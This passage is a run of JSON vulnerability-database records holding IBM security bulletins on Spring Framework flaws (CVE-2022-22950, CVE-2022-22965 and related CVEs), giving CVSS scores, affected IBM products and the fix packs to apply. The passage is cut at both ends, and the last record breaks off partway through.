"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-05-06T23:10:16", "id": "1EA754AFF092ED1712E3DBFA763C4962C7EF40031818AB374A5E52A9E9586AAD", "href": "https://www.ibm.com/support/pages/node/6583755", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-24T06:05:30", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data is affected but not vulnerable to a denial of service in Spring Framework (CVE-2022-22950) Spring Framework is used by IBM Watson Assistant for IBM Cloud Pak for Data as part of its developement infrastructure. The fix includes Spring version 5.3.18, 5.2.20 or later.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Assistant for IBM Cloud Pack for Data| 1.5.0, 4.0.0. 4.0.2, 4.0.4, 4.0.5, 4.0.6, 4.0.7 \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the latest (v4.0.8) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.8| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.8 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-06T23:17:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is affected but not classified as vulnerable to a denial of service in Spring Framework (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-05-06T23:17:00", "id": "67BA75B2F60B75FF432F4A7CBDBC2D43DE52B633C04D3C54ADA035D39D2605F7", "href": "https://www.ibm.com/support/pages/node/6583815", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-07-28T22:16:07", "description": "## Summary\n\nThere is a vulnerability in the Spring Framework open source library used by IBM OpenPages with Watson. This affects the IBM OpenPages application server. This vulnerability has been addressed. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \n \nIBM OpenPages with Watson\n\n| \n\n8.3, 8.2 \n \n## Remediation/Fixes\n\nA fix has been created for each affected version of the named product. Download and install the fix as soon as possible. Fixes and installation instructions are provided at the URLs listed below: \n \n\n\n**Fix**| **Download URL** \n---|--- \n \nFor IBM OpenPages with Watson **8.3**\n\n \n\\- Apply 8.3 Fix Pack 2 (**8.3.0.2**) or later\n\n| \n\n<https://www.ibm.com/support/pages/openpages-watson-83-fix-pack-2> \n \nFor IBM OpenPages with Watson **8.2**\n\n\\- Upgrade to 8.2 Fix Pack 4 (8.2.0.4)\n\n\\- Apply Interim Fix 7 (**8.2.0.4.7**) or later\n\nOr\n\n\\- Upgrade to 8.2 Fix Pack 5 (**8.2.0.5**)\n\n| \n\n**IBM recommends to use the latest Interim Fix (IF) or Fix Pack. Here is the link for more information:**\n\n<https://www.ibm.com/support/pages/openpages-watson-82-fix-list> \n \n \nFor IBM OpenPages with Watson 8.0/8.1 customers, IBM recommends to upgrade to a fixed and supported **versions 8.2, 8.3** or **9.0** of the product.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-07-28T16:47:11", "type": "ibm", "title": "Security Bulletin: A VMWare Tanzu Spring Vulerability Affects IBM OpenPages with Watson (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-07-28T16:47:11", "id": "74A7D00A0B82FD91F588DE70B4A7290F4ECF679732C8E10821324A255E55BCC3", "href": "https://www.ibm.com/support/pages/node/7015347", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-24T06:04:29", "description": "## Summary\n\nThere are multiple vulnerabilities in Spring Framework used by SPSS Collaboration and Deployment Services. SPSS Collaboration and Deployment Services is affected but not classified as vulnerable to these issues. The fix includes Spring 5.3.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22970](<https://vulners.com/cve/CVE-2022-22970>) \n** DESCRIPTION: **Vmware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw in the handling of file uploads. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226491](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226491>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22971](<https://vulners.com/cve/CVE-2022-22971>) \n** DESCRIPTION: **Vmware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw with a STOMP over WebSocket endpoint. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226492](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226492>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Collaboration and Deployment Services| 8.3 \nSPSS Collaboration and Deployment Services| 8.2.2 \nSPSS Collaboration and Deployment Services| 8.2.1 \nSPSS Collaboration and Deployment Services| 8.2 \nSPSS Collaboration and Deployment Services| 8.1.1 \nSPSS Collaboration and Deployment Services| 8.1 \nSPSS Collaboration and Deployment Services| 8.0 \n \n\n\n## Remediation/Fixes\n\nProduct | VRMF| Remediation/First Fix \n---|---|--- \nSPSS Collaboration and Deployment Services| 8.3.0.0| [8.3.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.3.0.0-IM-SCaDS-IF008&source=SAR> \"8.3.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.2.0| [8.2.2.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.2.0-IM-SCaDS-IF009&source=SAR> \"8.2.2.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.1.0| [8.2.1.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.1.0-IM-SCaDS-IF007&source=SAR> \"8.2.1.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.0.0| [8.2.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.0.0-IM-SCaDS-IF007&source=SAR> \"8.2.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.1.1.0 \n| [8.1.1.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.1.1.0-IM-SCaDS-IF008&source=SAR> \"8.1.1.0\" ) \nSPSS Collaboration and Deployment Services| 8.1.0.0 \n| [8.1.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.1.0.0-IM-SCaDS-IF009&source=SAR> \"8.1.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.0.0.0 \n| [8.0.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.0.0.0-IM-SCaDS-IF009&source=SAR> \"8.0.0.0\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-30T14:20:34", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Spring Framework affect SPSS Collaboration and Deployment Services", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-22970", "CVE-2022-22971"], "modified": "2022-05-30T14:20:34", "id": "C602AE40F6974D4EE4D596F81D007D4F74282F20DC8B4859AE08925E2CE79326", "href": "https://www.ibm.com/support/pages/node/6590869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:07:04", "description": "## Summary\n\nIBM Maximo For Civil infrastructure is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring Boot 2.6.6 that depends on Spring Framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo for Civil Infrastructure| 7.6.2.1, 7.6.3, 7.6.3.1 \n \n\n\n## Remediation/Fixes\n\nDownload the correct version of the fix from the following link: [IBM Maximo for Civil Infrastructure V7.6.3.2 Fix Pack](<https://www.ibm.com/support/pages/node/6569525> \"IBM Maximo for Civil Infrastructure V7.6.3.2 Fix Pack\" ). Installation instructions for the fix are included in the readme document that is in the fix package.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T15:15:01", "type": "ibm", "title": "Security Bulletin: IBM Maximo For Civil infrastructure is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T15:15:01", "id": "22F3632F9800C8C7D12EDA0C85AC627F2AABCAA068D310065EEF12F9F4A345C4", "href": "https://www.ibm.com/support/pages/node/6570913", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:55:42", "description": "## Summary\n\nIBM Case Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework [CVE-2022-22965]. To be vulnerable a product must meet all of the following criterias: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Cloud connector service if enabled will use only the spring, as in a client to make only the REST calls with IBM Cloud Mangement Console. The fix includes Spring 5.3.18. IBM Case Manager doesn't meet all of the criterias and, therefore, is not vulnerable.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Case Manager| 5.3CD \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the affected versions by applying the appropriate interim fix or upgrading.**\n\nAffected Product(s)| Version(s)| Remediation / Fix \n---|---|--- \nIBM Case Manager| V5.3.0 - V5.3.3| Apply IBM Case Manager interim fix for [DT143005](<https://www.ibm.com/mysupport/aCI3p000000Xio5> \"DT143005\" ) or upgrade to IBM Business Automation Workflow 22.0.1 or later. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T00:45:52", "type": "ibm", "title": "Security Bulletin: IBM Case Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework [CVE-2022-22965]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-10-01T00:45:52", "id": "B547E4473646186969A14DFF0C2EB7D3D14D2E03EBA009074D6083D7482CB50F", "href": "https://www.ibm.com/support/pages/node/6825845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:49", "description": "## Summary\n\nIBM InfoSphere Information Server is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in our Rest apis, application deployment inside containers. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nInfoSphere Information Server, \nInformation Server on Cloud| 11.7 \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRMF**| **APAR**| **Remediation** \n---|---|---|--- \nInfoSphere Information Server, InfoSphere Information Server on Cloud| 11.7| [JR64760](<http://www.ibm.com/support/docview.wss?uid=swg1JR64760> \"JR64760\" )| \\--Apply IBM InfoSphere Information Server version [11.7.1.0](<https://www.ibm.com/support/pages/node/878310>) \n\\--Apply IBM InfoSphere Information Server version [11.7.1.3](<https://www.ibm.com/support/pages/node/6498109> \"11.7.1.3\" ) \n\\--Apply Information Server [11.7.1.3 Service pack 4](<https://www.ibm.com/support/pages/node/6568469> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T23:09:44", "type": "ibm", "title": "Security Bulletin: IBM InfoSphere Information Server is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T23:09:44", "id": "55BD84BAE8C7A14BA43B1D5F808B6528E4FBEF810015A85F798847837C477C2F", "href": "https://www.ibm.com/support/pages/node/6575577", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:36", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used by IBM Watson Assistant for IBM Cloud Pak for Data as part of its developement infrastructure. The fix includes Spring version 5.3.18, 5.2.20 or later.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Assistant for IBM Cloud Pack for Data| 1.5.0, 4.0.0. 4.0.2, 4.0.4, 4.0.5, 4.0.6, 4.0.7 \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the latest (v4.0.8) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.8| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.8 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T07:36:23", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-05T07:36:23", "id": "DD71E3BE311976CFF7FE89F0916C7047300E0A1E779B1D8D85CA991081F0FBC3", "href": "https://www.ibm.com/support/pages/node/6581969", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:02:46", "description": "## Summary\n\nIBM Tivoli Netcool Impact is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965).Spring is shipped as part of ActiveMQ package but is not used by the product. The fix removes Spring from the product.\n\n## Vulnerability Details\n\n** CVEID: 